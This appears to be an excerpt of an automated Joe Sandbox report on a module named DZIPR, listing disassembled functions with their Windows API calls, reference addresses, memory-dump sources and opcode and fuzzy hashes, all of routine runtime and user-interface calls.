                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                        • String ID:
                                        • API String ID: 2714421763-0
                                        • Opcode ID: 904df57df9561c4ab717923bc168f39cea9290b0b63e9b35cac6025d6b06e29c
                                        • Instruction ID: 2a45c828e029a07cec60005384078cf4b42bef646f3a557daaa749c30b362255
                                        • Opcode Fuzzy Hash: 904df57df9561c4ab717923bc168f39cea9290b0b63e9b35cac6025d6b06e29c
                                        • Instruction Fuzzy Hash: DC01A232925725EBDF245FB19808F9E3B789F21329F204509E094AAA88CB3DD5449E98
                                        APIs
                                        • TlsFree.KERNEL32(?,?,?,6C91C179), ref: 6C91C13B
                                        • GlobalHandle.KERNEL32(?), ref: 6C91C149
                                        • GlobalUnlock.KERNEL32(00000000), ref: 6C91C152
                                        • GlobalFree.KERNEL32(00000000), ref: 6C91C159
                                        • RtlDeleteCriticalSection.NTDLL ref: 6C91C163
                                          • Part of subcall function 6C91BF5D: RtlEnterCriticalSection.NTDLL(?), ref: 6C91BFBC
                                          • Part of subcall function 6C91BF5D: RtlLeaveCriticalSection.NTDLL(?), ref: 6C91BFCC
                                          • Part of subcall function 6C91BF5D: LocalFree.KERNEL32(?), ref: 6C91BFD5
                                          • Part of subcall function 6C91BF5D: TlsSetValue.KERNEL32(?,00000000), ref: 6C91BFE7
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: CriticalFreeGlobalSection$DeleteEnterHandleLeaveLocalUnlockValue
                                        • String ID:
                                        • API String ID: 1549993015-0
                                        • Opcode ID: 2d2a78339d56c7ad5472f2f090944904353471f41ef50c3fa98355fbed9f8b34
                                        • Instruction ID: af360507bd5d676b45eca4ea1d147de2cb6af01783d94485b4e7d81620e98316
                                        • Opcode Fuzzy Hash: 2d2a78339d56c7ad5472f2f090944904353471f41ef50c3fa98355fbed9f8b34
                                        • Instruction Fuzzy Hash: 53F054363096009BDB256B789C49E1B36BD9F86774735061AF529D3B41CB30D9038768
                                        APIs
                                        • GetMenuCheckMarkDimensions.USER32 ref: 6C9196F2
                                        • _memset.LIBCMT ref: 6C91976A
                                        • LoadBitmapW.USER32(00000000,00007FE3), ref: 6C9197E5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: BitmapCheckDimensionsLoadMarkMenu_memset
                                        • String ID:
                                        • API String ID: 3130454499-3916222277
                                        • Opcode ID: 5d694ac8034b53d1085788f6afbf0b5f51e8ae87368c1bf3db6e95c2749abfb4
                                        • Instruction ID: 4c5ec0318dc31ec61609b0467639a12945f856af714de5439049992e966fee37
                                        • Opcode Fuzzy Hash: 5d694ac8034b53d1085788f6afbf0b5f51e8ae87368c1bf3db6e95c2749abfb4
                                        • Instruction Fuzzy Hash: 04314971B042189BEF248F389CC5BA97BB8FF45708F5580A7E549DB680DB30C9498F50
                                        APIs
                                          • Part of subcall function 6C91C220: RtlEnterCriticalSection.NTDLL(6C9434A8), ref: 6C91C25A
                                          • Part of subcall function 6C91C220: RtlInitializeCriticalSection.NTDLL(?), ref: 6C91C26C
                                          • Part of subcall function 6C91C220: RtlLeaveCriticalSection.NTDLL(6C9434A8), ref: 6C91C279
                                          • Part of subcall function 6C91C220: RtlEnterCriticalSection.NTDLL(?), ref: 6C91C289
                                          • Part of subcall function 6C91BB0C: __EH_prolog3_catch.LIBCMT ref: 6C91BB13
                                          • Part of subcall function 6C916DC1: __CxxThrowException@8.LIBCMT ref: 6C916DD7
                                          • Part of subcall function 6C916DC1: __EH_prolog3.LIBCMT ref: 6C916DE4
                                        • GetProcAddress.KERNEL32(00000000,HtmlHelpW), ref: 6C921458
                                        • FreeLibrary.KERNEL32(?), ref: 6C921468
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
                                        • String ID: HtmlHelpW$hhctrl.ocx
                                        • API String ID: 2853499158-3773518134
                                        • Opcode ID: 672d6d0eee22fc4bc81ccb7d68da32371b2fc3f0b3d72eab7a28526987ab14e7
                                        • Instruction ID: 065f88086550a4a448bd0dca7fb1341c269050cae1e0c7639d7536ef3f10cf16
                                        • Opcode Fuzzy Hash: 672d6d0eee22fc4bc81ccb7d68da32371b2fc3f0b3d72eab7a28526987ab14e7
                                        • Instruction Fuzzy Hash: 4801263150871AA7CB211BA5CC05B873BB5AF11359F00C926F48E95D50CB35D820D651
                                        APIs
                                        • ___BuildCatchObject.LIBCMT ref: 6C92C7D6
                                          • Part of subcall function 6C92C731: ___BuildCatchObjectHelper.LIBCMT ref: 6C92C767
                                        • _UnwindNestedFrames.LIBCMT ref: 6C92C7ED
                                        • ___FrameUnwindToState.LIBCMT ref: 6C92C7FB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                        • String ID: csm
                                        • API String ID: 2163707966-1018135373
                                        • Opcode ID: 9333c40b5dfdbc582cc92e6f10fbdaaaf62e4115b5764113ccc931296aa917a4
                                        • Instruction ID: b2005771d9ca817167a045fe31111b5e3c1b5a7dff6dff206875d9a048907665
                                        • Opcode Fuzzy Hash: 9333c40b5dfdbc582cc92e6f10fbdaaaf62e4115b5764113ccc931296aa917a4
                                        • Instruction Fuzzy Hash: 6901F632011109BBEF126F51CC44EEA7F6AFF28358F104010FD9855A28D77AD9B1EBA1
                                        APIs
                                        • GetModuleHandleA.KERNEL32(KERNEL32,6C9277D7), ref: 6C92ED7C
                                        • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 6C92ED8C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: AddressHandleModuleProc
                                        • String ID: IsProcessorFeaturePresent$KERNEL32
                                        • API String ID: 1646373207-3105848591
                                        • Opcode ID: b53afd71369b934234e6c2e1b038d36e7d0bf160942bed28c87db752c55c5016
                                        • Instruction ID: 9ecd6f295f4969f915359191dfc63b85f7ef16a4e279ba8f0141f354af2a3610
                                        • Opcode Fuzzy Hash: b53afd71369b934234e6c2e1b038d36e7d0bf160942bed28c87db752c55c5016
                                        • Instruction Fuzzy Hash: F7F03030A14A09D2EF101FF1AD5D66F7A79FB82746F920990E1D9E0488DF34C0B49289
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: File$SizeTime_memset
                                        • String ID:
                                        • API String ID: 151880914-0
                                        • Opcode ID: 1b86f5f45fe89c964d50170b84883a064cd64cd89e46ea6d5bac6056b8c5852c
                                        • Instruction ID: fa7fdce996b04148771a9d4787754374cbe9e5635dba8e6c7fdeedd8ac2efa7d
                                        • Opcode Fuzzy Hash: 1b86f5f45fe89c964d50170b84883a064cd64cd89e46ea6d5bac6056b8c5852c
                                        • Instruction Fuzzy Hash: 4C511D7550860A9FDB24CF68C941D9AB7F8FF19324B104A1EE4AAD3E90E730F944CB60
                                        APIs
                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6C93084F
                                        • __isleadbyte_l.LIBCMT ref: 6C930883
                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,6C9240D8,6C93BF84,00000000,00000000,?,?,?,?,6C9240D8,00000000,?), ref: 6C9308B4
                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,6C9240D8,00000001,00000000,00000000,?,?,?,?,6C9240D8,00000000,?), ref: 6C930922
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                        • String ID:
                                        • API String ID: 3058430110-0
                                        • Opcode ID: 08e394900b1d7c478792346d74cd5a48c04403da08b722898d79a0c4e83d8773
                                        • Instruction ID: 368628033677e6d873531694243d9ad97007395990739c34f573059b3444e543
                                        • Opcode Fuzzy Hash: 08e394900b1d7c478792346d74cd5a48c04403da08b722898d79a0c4e83d8773
                                        • Instruction Fuzzy Hash: C031E531A052E9EFDB00CF64C880AAE7BB9FF01314F1465E9E86C9B591DB32D941DB90
                                        APIs
                                        • GlobalLock.KERNEL32(?), ref: 6C9188E7
                                        • lstrcmpW.KERNEL32(00000000,?), ref: 6C9188F4
                                        • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 6C91892E
                                        • GlobalLock.KERNEL32(00000000), ref: 6C918938
                                          • Part of subcall function 6C91DAD1: GlobalFlags.KERNEL32(?), ref: 6C91DAE0
                                          • Part of subcall function 6C91DAD1: GlobalUnlock.KERNEL32(?), ref: 6C91DAF2
                                          • Part of subcall function 6C91DAD1: GlobalFree.KERNEL32(?), ref: 6C91DAFD
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: Global$Lock$AllocFlagsFreeUnlocklstrcmp
                                        • String ID:
                                        • API String ID: 2391069079-0
                                        • Opcode ID: 96d87e3ed64bfe298746a170ec9025410af96d6bd61172ca5935e9ef0b763fe9
                                        • Instruction ID: d062b71f594ed351d9a7a3dcdfb045b4201216f452fa2551e44c00e54fb734e0
                                        • Opcode Fuzzy Hash: 96d87e3ed64bfe298746a170ec9025410af96d6bd61172ca5935e9ef0b763fe9
                                        • Instruction Fuzzy Hash: 8411A372508608BFCF229BA5CC49CAF7BFDFB99B44761041AFA05D2920D731D900E724
                                        APIs
                                        • RtlEnterCriticalSection.NTDLL(?), ref: 6C91BFBC
                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 6C91BFCC
                                        • LocalFree.KERNEL32(?), ref: 6C91BFD5
                                        • TlsSetValue.KERNEL32(?,00000000), ref: 6C91BFE7
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                        • String ID:
                                        • API String ID: 2949335588-0
                                        • Opcode ID: b47447b30555c4a1ddce00d8c8ab396fcb7a1f9cd76d5445322e7e08e6df6f67
                                        • Instruction ID: 57463212be4ea3e7f906f9f959b5c69c6ef664f01489295b8339349bc77e186d
                                        • Opcode Fuzzy Hash: b47447b30555c4a1ddce00d8c8ab396fcb7a1f9cd76d5445322e7e08e6df6f67
                                        • Instruction Fuzzy Hash: 3C1156B1605208AFD7149F64C885B5AB7BAEB46319F20842AF1568BAA1CB70E960CF50
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C918ED0
                                          • Part of subcall function 6C919C7C: __EH_prolog3.LIBCMT ref: 6C919C83
                                        • __wcsdup.LIBCMT ref: 6C918EF2
                                        • GetCurrentThread.KERNEL32 ref: 6C918F1F
                                        • GetCurrentThreadId.KERNEL32 ref: 6C918F28
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: CurrentH_prolog3Thread$__wcsdup
                                        • String ID:
                                        • API String ID: 190065205-0
                                        • Opcode ID: 63497b69dfd9ffb4992272e94c2949303ec71429b614fe1d20eb9ba80bc97190
                                        • Instruction ID: b422141e9f407a4de6ae3ff2c1fa016587cd5d64bb2d762b7a3c8c336b4df52a
                                        • Opcode Fuzzy Hash: 63497b69dfd9ffb4992272e94c2949303ec71429b614fe1d20eb9ba80bc97190
                                        • Instruction Fuzzy Hash: CC219BB0905B548FC7259F7A854628AFAF8BFA4704F20891FD1AAC7B25CBB0E144DF44
                                        APIs
                                        • SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 6C921D33
                                        • SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 6C921D5E
                                        • GetCapture.USER32 ref: 6C921D70
                                        • SendMessageW.USER32(00000000,0000001F,00000000,00000000), ref: 6C921D7F
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: MessageSend$Capture
                                        • String ID:
                                        • API String ID: 1665607226-0
                                        • Opcode ID: ed08588cc6570b3390daa99ff2e99857d532ccb6ee84b6b878386c5ada8b1b4b
                                        • Instruction ID: 5d11f578c298abf5e3e8d94fcdee5c595f0bca3da182d6d671aebf8f281e9356
                                        • Opcode Fuzzy Hash: ed08588cc6570b3390daa99ff2e99857d532ccb6ee84b6b878386c5ada8b1b4b
                                        • Instruction Fuzzy Hash: CF0171313602947BDF301B628CCDFDB3E7ADFCAB10F110079B6459A1AACAA5C814D660
                                        APIs
                                        • RegSetValueExW.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 6C91D194
                                        • RegCloseKey.ADVAPI32(00000000), ref: 6C91D19D
                                        • swprintf.LIBCMT ref: 6C91D1BA
                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 6C91D1CB
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: ClosePrivateProfileStringValueWriteswprintf
                                        • String ID:
                                        • API String ID: 22681860-0
                                        • Opcode ID: a1b914d72d65d8a34d9383d87dd8156d68c26448274ca5edf810f3e1d9fa82ee
                                        • Instruction ID: ead0bd43f0c59dbcea8cc42a2770b7b17ef3fbb7152fe065110627e1d5ebf339
                                        • Opcode Fuzzy Hash: a1b914d72d65d8a34d9383d87dd8156d68c26448274ca5edf810f3e1d9fa82ee
                                        • Instruction Fuzzy Hash: C301AD7260020CABDB159A648C86FAB77BCAF4A718F10041AF901E7640DB74EA1487A4
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C916A8A
                                          • Part of subcall function 6C9168E2: _malloc.LIBCMT ref: 6C916900
                                        • __CxxThrowException@8.LIBCMT ref: 6C916AC0
                                        • FormatMessageW.KERNEL32(00001100,00000000,?,00000800,6C9116A6,00000000,00000000,?,?,6C93D898,00000004,6C9116A6,00000000,6C9169F9,00000000), ref: 6C916AEA
                                        • LocalFree.KERNEL32(6C9116A6,6C9116A6,00000000,6C9169F9,00000000), ref: 6C916B12
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc
                                        • String ID:
                                        • API String ID: 1776251131-0
                                        • Opcode ID: 9d3b5b83b12800874c7fb93a4bbbeabab3fe5453b95e3262af37ce4b7f753f68
                                        • Instruction ID: 27d48a34c63b557e411edf259fe7543ac9819982d41443ef870e0bae863a8cc7
                                        • Opcode Fuzzy Hash: 9d3b5b83b12800874c7fb93a4bbbeabab3fe5453b95e3262af37ce4b7f753f68
                                        • Instruction Fuzzy Hash: 89119171A48249AFDF04CF68CC419AE37B5EF58314F20C529F929CBA90E731D510CB54
                                        APIs
                                          • Part of subcall function 6C9168E2: _malloc.LIBCMT ref: 6C916900
                                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 6C9172BB
                                        • GetCurrentProcess.KERNEL32(?,00000000), ref: 6C9172C1
                                        • DuplicateHandle.KERNEL32(00000000), ref: 6C9172C4
                                        • GetLastError.KERNEL32(?), ref: 6C9172DF
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
                                        • String ID:
                                        • API String ID: 3704204646-0
                                        • Opcode ID: f731b1095bc78a00a3f24d44dffe3f4818e611650ff866dd9b39410ad260c956
                                        • Instruction ID: 725b4c96332a81af2f9afcf291380742d0dd5da98f6e955e1608881627c68278
                                        • Opcode Fuzzy Hash: f731b1095bc78a00a3f24d44dffe3f4818e611650ff866dd9b39410ad260c956
                                        • Instruction Fuzzy Hash: 2201D43174424AABDB108BA6CD8AF5A7BADEF84354F244812F908CBA41DF70DC01C760
                                        APIs
                                        • GetTopWindow.USER32(?), ref: 6C920F9D
                                        • GetTopWindow.USER32(00000000), ref: 6C920FDC
                                        • GetWindow.USER32(00000000,00000002), ref: 6C920FFA
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: Window
                                        • String ID:
                                        • API String ID: 2353593579-0
                                        • Opcode ID: b60e10604ef12271ccab04803e16d25ccacdc5c27301ec8d2d9dd53903f7b601
                                        • Instruction ID: 32362283ea11925cfa6a021bb1de996ebbe253196180f538787fb1e72df92a26
                                        • Opcode Fuzzy Hash: b60e10604ef12271ccab04803e16d25ccacdc5c27301ec8d2d9dd53903f7b601
                                        • Instruction Fuzzy Hash: E201693208529ABBCF225E918D08EDF3F2AAF49394F104011FA9455928C73AC531EBA5
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                        • String ID:
                                        • API String ID: 3016257755-0
                                        • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                        • Instruction ID: 2e2b2fca7b167e623cd79f89b8639961ef1f6bc3af0b81020b4218ae9c397217
                                        • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                        • Instruction Fuzzy Hash: F911837241014EBBCF129FD4DC81CDD3F66BB19359F188414FAA855534C73AC6B1AB81
                                        APIs
                                        • GetDlgItem.USER32(?,?), ref: 6C9203DC
                                        • GetTopWindow.USER32(00000000), ref: 6C9203EF
                                          • Part of subcall function 6C9203CF: GetWindow.USER32(00000000,00000002), ref: 6C920436
                                        • GetTopWindow.USER32(?), ref: 6C92041F
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: Window$Item
                                        • String ID:
                                        • API String ID: 369458955-0
                                        • Opcode ID: 621f60b7a6ba9ecf98f14fa39487575af379939c2043cf055266cfae59f2591d
                                        • Instruction ID: ef29f82875ba429ba2fd538cdfc344c974800e927222710cd074b2aae1e9b440
                                        • Opcode Fuzzy Hash: 621f60b7a6ba9ecf98f14fa39487575af379939c2043cf055266cfae59f2591d
                                        • Instruction Fuzzy Hash: A901F73211659ABBDF222F218C24ECF3A2DAF51398F04E122FD5891909F738C51186D5
                                        APIs
